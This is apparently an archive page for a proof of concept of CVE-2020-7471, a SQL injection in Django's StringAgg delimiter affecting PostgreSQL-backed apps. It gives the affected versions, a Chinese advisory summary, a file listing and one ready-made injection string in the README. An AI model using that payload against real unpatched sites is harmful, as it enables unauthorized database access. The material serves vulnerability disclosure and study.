CVE-2020-7471 PoC — Django SQL注入漏洞

Source

https://github.com/huzaifakhan771/CVE-2020-7471-Django

Associated Vulnerability

Title:Django SQL注入漏洞 (CVE-2020-7471)
Description:Django是Django基金会的一套基于Python语言的开源Web应用框架。该框架包括面向对象的映射器、视图系统、模板系统等。 Django 1.11.28之前的1.11版本、2.2.10之前的2.2版本和3.0.3之前的3.0版本中存在SQL注入漏洞。远程攻击者可借助特制StringAgg分隔符利用该漏洞造成拒绝服务，获取信息或提升权限。

Description

PoC for the SQL injection vulnerability in PostgreSQL with Django, found in Django 1.11 before 1.11.28, 2.2 before 2.2.10, and 3.0 before 3.0.3

Readme

# CVE-2020-7471-PoC (Django)
PoC for the SQL injection vulnerability in PostgreSQL with Django, found in Django 1.11 before 1.11.28, 2.2 before 2.2.10, and 3.0 before 3.0.3

The class `django.contrib.postgres.aggregates.StringAgg` for using the PostgreSQL STRING_AGG function had a SQL injection vulnerability. It is 
possible to embed an arbitrary query in the value passed to the delimiter parameter at initialization.

The query is injected through a form in this Django app.
Query used for SQL injection: `-') AS "mydefinedname" FROM "cve_src_example" GROUP BY "cve_src_example"."label" LIMIT 1 OFFSET 1 -- `


### Django Version used: Django 3.0.2
### PostgreSQL version used: 9.6.16

File Snapshot


 [4.0K]  /data/pocs/fa3b59c5e54e776caef94f8cc4db3218db81fac1
├── [ 689]  README.md
├── [1.6K]  requirements.txt
└── [1.0K]  views.py

0 directories, 3 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!